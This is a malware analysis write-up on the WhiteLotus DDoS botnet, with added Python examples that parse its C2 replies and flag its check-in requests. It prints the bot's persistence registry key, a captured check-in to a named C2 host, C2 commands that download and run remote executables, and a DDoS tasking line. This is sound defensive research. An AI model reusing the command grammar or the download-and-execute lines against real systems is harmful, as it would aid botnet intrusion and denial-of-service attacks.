WhiteLotus DDoS Botnet Analysis

Another new DDoS botnet family we found in our malcode zoo recently, which we have dubbed “WhiteLotus”, resembles BlackEnergy v2 but differs enough that we knew it wasn’t BEv2. Joe Stewart’s excellent BlackEnergy v2 analysis shows how that version of BlackEnergy is modular, adds encryption and information theft to its arsenal of attacks, and keeps its DDoS capabilities.

WhiteLotus doesn’t appear to be modular, but it uses some of the same command grammar as BEv2, which is what got me looking at it. WhiteLotus also doesn’t use encryption.

The bot usually installs itself as a 60 KB Windows EXE at:

C:\WINDOWS\system32\windef.exe

To ensure the bot runs at startup, it creates the following registry key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\windef.exe:
C:\WINDOWS\system32\windef.exe

We haven’t seen rootkits or other hiding tools associated with this bot.

WhiteLotus can download and run files and can launch DDoS attacks. Here’s an example of its communications, using an HTTP POST to check in and retrieve commands:

POST /[REMOVED].php HTTP/1.0
Host: crimesteambot.u2m.ru
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
id=HOSTNAME_2fee31f62405239f&btnet=symb&version=2&os=2600&nat=1

The server replies in plaintext, with a list of commands for the bot to act on:

HTTP/1.0 200 OK
Connection: close
X-Powered-By: PHP/5.2.6
Content-Type: text/plain
Date: Fri, 26 Mar 2010 21:37:07 GMT
Server: lighttpd/1.4.20
14|dlexec|hxxp://wassilijisgood.kilu.de/[REMOVED].exe|mem||hidden
13|dlexec|hxxp://derweisselotus.com/adm/[REMOVED].exe|mem||hidden
100

A DDoS command sent to the bot looks like this:

14|ddos|http|93.184.222.141:1935|0|100|25|0.60
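The server’s reply is a pipe-delimited task list, one task per line, terminated by a bare number. The parser below is an added example for analysts working from a capture; it is not code from the original post. The field names it assigns (task id, command, arguments) and its reading of the trailing “100” as a status line are assumptions inferred from the two command shapes quoted above, and the sample reply is constructed by pasting those quoted lines together, defanged URLs and [REMOVED] placeholders included.

```python
"""Parse a captured WhiteLotus C2 reply into structured task records.

Added analyst example, not code from the original write-up. Field layout
(id|command|args...) and the trailing bare number being a status code are
assumptions drawn from the quoted samples.
"""
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: the reply lines quoted in the write-up, as captured.
SAMPLE_REPLY = """14|dlexec|hxxp://wassilijisgood.kilu.de/[REMOVED].exe|mem||hidden
13|dlexec|hxxp://derweisselotus.com/adm/[REMOVED].exe|mem||hidden
14|ddos|http|93.184.222.141:1935|0|100|25|0.60
100
"""


@dataclass
class Task:
    task_id: int
    command: str          # e.g. "dlexec" or "ddos"
    args: List[str]       # remaining pipe-separated fields, kept verbatim


@dataclass
class C2Reply:
    tasks: List[Task] = field(default_factory=list)
    status: Optional[int] = None   # trailing bare integer (assumed status)


def parse_reply(body: str) -> C2Reply:
    """Split a reply body into Task records; unknown lines are skipped, not guessed."""
    reply = C2Reply()
    for raw in body.splitlines():
        line = raw.strip()
        if not line:
            continue
        parts = line.split("|")
        if len(parts) == 1:
            # A bare integer line (the "100" terminator) is treated as a status.
            if parts[0].isdigit():
                reply.status = int(parts[0])
            continue
        if not parts[0].isdigit():
            continue  # not a task record in the observed grammar
        reply.tasks.append(Task(int(parts[0]), parts[1], parts[2:]))
    return reply


def download_urls(reply: C2Reply) -> List[str]:
    """URLs named in dlexec tasks, for IOC extraction and blocklisting."""
    return [t.args[0] for t in reply.tasks if t.command == "dlexec" and t.args]


def ddos_targets(reply: C2Reply) -> List[str]:
    """host:port values named in ddos tasks (observed layout: method|target|...)."""
    return [t.args[1] for t in reply.tasks if t.command == "ddos" and len(t.args) > 1]


if __name__ == "__main__":
    parsed = parse_reply(SAMPLE_REPLY)
    for task in parsed.tasks:
        print(task)
    print("status:", parsed.status)
    print("download URLs:", download_urls(parsed))
    print("DDoS targets:", ddos_targets(parsed))
```

Lines that don’t fit the observed grammar are skipped rather than interpreted, so the parser only ever reports what the capture actually contains; the extracted URLs and targets can be fed straight into a blocklist or an incident ticket.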

Static analysis reveals that the bot is a UPX-packed Microsoft Visual Basic binary that drops a second binary with a Caesar shift of 13 positions (ROT13) applied to it. Once that layer is undone, you can see that the bot also supports SOCKS5 proxy features.

Some things to note with this bot’s HTTP transactions (e.g. if you’re writing a signature):

  • it uses HTTP/1.0
  • there is no User-Agent header
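The two header traits above, together with the fixed check-in field names in the POST body, are what a signature would key on. The following is an added detection example, not code from the original post: it takes a raw HTTP request as text, returns which WhiteLotus indicators it matches, and treats a request as suspicious only when more than one indicator is present, since HTTP/1.0 or a missing User-Agent alone is common in benign traffic. The captured request is the one quoted above; the benign request beside it is constructed for contrast, and the two-hit threshold is an assumption.

```python
"""Match a raw HTTP request against the WhiteLotus check-in traits.

Added detection example, not code from the original write-up. The
two-indicator threshold in looks_like_whitelotus() is an assumption.
"""
from typing import Dict, List, Tuple
from urllib.parse import parse_qs

# Captured check-in from the write-up (path redacted as in the original).
CAPTURED = (
    "POST /[REMOVED].php HTTP/1.0\r\n"
    "Host: crimesteambot.u2m.ru\r\n"
    "Keep-Alive: 300\r\n"
    "Connection: keep-alive\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 60\r\n"
    "\r\n"
    "id=HOSTNAME_2fee31f62405239f&btnet=symb&version=2&os=2600&nat=1"
)

# Constructed benign request used as a negative control.
BENIGN = (
    "POST /login HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 17\r\n"
    "\r\n"
    "user=a&password=b"
)

# Form fields seen in the bot's check-in body.
CHECKIN_FIELDS = {"id", "btnet", "version", "os", "nat"}


def split_request(raw: str) -> Tuple[str, Dict[str, str], str]:
    """Return (request line, lower-cased header map, body) from raw request text."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def whitelotus_indicators(raw: str) -> List[str]:
    """List the WhiteLotus traits a request exhibits, in a fixed order."""
    request_line, headers, body = split_request(raw)
    hits: List[str] = []
    parts = request_line.split()
    if len(parts) == 3 and parts[0] == "POST" and parts[2] == "HTTP/1.0":
        hits.append("POST over HTTP/1.0")
    if "user-agent" not in headers:
        hits.append("no User-Agent header")
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        fields = set(parse_qs(body, keep_blank_values=True))
        if CHECKIN_FIELDS <= fields:
            hits.append("check-in fields id/btnet/version/os/nat")
    return hits


def looks_like_whitelotus(raw: str, min_hits: int = 2) -> bool:
    """Flag only when several traits coincide, to keep false positives down."""
    return len(whitelotus_indicators(raw)) >= min_hits


if __name__ == "__main__":
    for label, req in (("captured", CAPTURED), ("benign", BENIGN)):
        print(label, whitelotus_indicators(req), looks_like_whitelotus(req))
```

The body-field check is the strongest of the three indicators; the other two are weak on their own, which is why the verdict requires at least two matches rather than any one.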

Other than that it’s a standard HTTP DDoS bot. It appears to be in limited distribution, with only a handful of samples and a handful of new servers seen so far.
